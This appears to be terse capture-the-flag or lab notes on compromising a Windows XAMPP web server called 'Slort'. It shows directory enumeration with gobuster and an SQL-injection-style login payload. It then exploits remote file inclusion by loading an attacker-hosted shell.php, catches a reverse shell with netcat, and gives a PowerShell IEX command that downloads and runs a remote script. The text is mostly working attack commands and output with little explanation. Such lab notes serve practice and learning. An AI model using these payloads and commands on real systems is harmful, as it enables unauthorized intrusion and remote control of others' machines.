4 :4443 xampp
http://192.168.105.53:4443/dashboard/
XAMPP Splash Landing page
http://192.168.105.53:4443/dashboard/phpinfo.php
PHP Version 7.4.6
System Windows NT SLORT 10.0 build 18363 (Windows 10) AMD64
Architecture x64
$ gobuster dir -u http://192.168.105.53:4443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
2021/08/13 15:58:00 Starting gobuster in directory enumeration mode
===============================================================
/site (Status: 301) [Size: 346] [--> http://192.168.105.53:4443/site/]
/Index.php (Status: 302) [Size: 0] [--> http://192.168.105.53:4443/dashboard/]
/applications.html (Status: 200) [Size: 3607]
/index.php (Status: 302) [Size: 0] [--> http://192.168.105.53:4443/dashboard/]
/img (Status: 301) [Size: 345] [--> http://192.168.105.53:4443/img/]
/examples (Status: 503) [Size: 1060]
http://192.168.105.53:4443/site/index.php?page=main.php
Slort
$ gobuster dir -u http://192.168.105.53:4443/site -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
2021/08/13 15:58:57 Starting gobuster in directory enumeration mode
===============================================================
/services.php (Status: 200) [Size: 11819]
/contact.php (Status: 200) [Size: 8984]
/main.php (Status: 200) [Size: 12541]
/Images (Status: 301) [Size: 353] [--> http://192.168.105.53:4443/site/Images/]
/about.php (Status: 200) [Size: 15439]
/index.php (Status: 301) [Size: 27] [--> index.php?page=main.php]
/css (Status: 301) [Size: 350] [--> http://192.168.105.53:4443/site/css/]
/About.php (Status: 200) [Size: 15439]
/Contact.php (Status: 200) [Size: 8984]
/Index.php (Status: 301) [Size: 27] [--> index.php?page=main.php]
/license.txt (Status: 200) [Size: 17128]
/portfolio.php (Status: 200) [Size: 11865]
/js (Status: 301) [Size: 349] [--> http://192.168.105.53:4443/site/js/]
/README.txt (Status: 200) [Size: 781]
/Services.php (Status: 200) [Size: 11819]
/images (Status: 301) [Size: 353] [--> http://192.168.105.53:4443/site/images/]
/readme.txt (Status: 200) [Size: 781]
http://192.168.105.53:4443/site/index.php?page='
Warning: include('): failed to open stream: No such file or directory in C:\xampp\htdocs\site\index.php on line 4
Warning: include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in C:\xampp\htdocs\site\index.php on line 4
[+] use payload : user & pass : '=' 'OR'
# not sure how to make LFI work
# trying RFI
# works
http://192.168.105.53:4443/site/index.php?page=http://192.168.49.105/shell.php
$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.49.105] from (UNKNOWN) [192.168.105.53] 49835
SOCKET: Shell has connected! PID: 2996
Microsoft Windows [Version 10.0.18363.900]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\site>whoami
slort\rupert
# PS shell using powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.49.105/rev.ps1')Last updated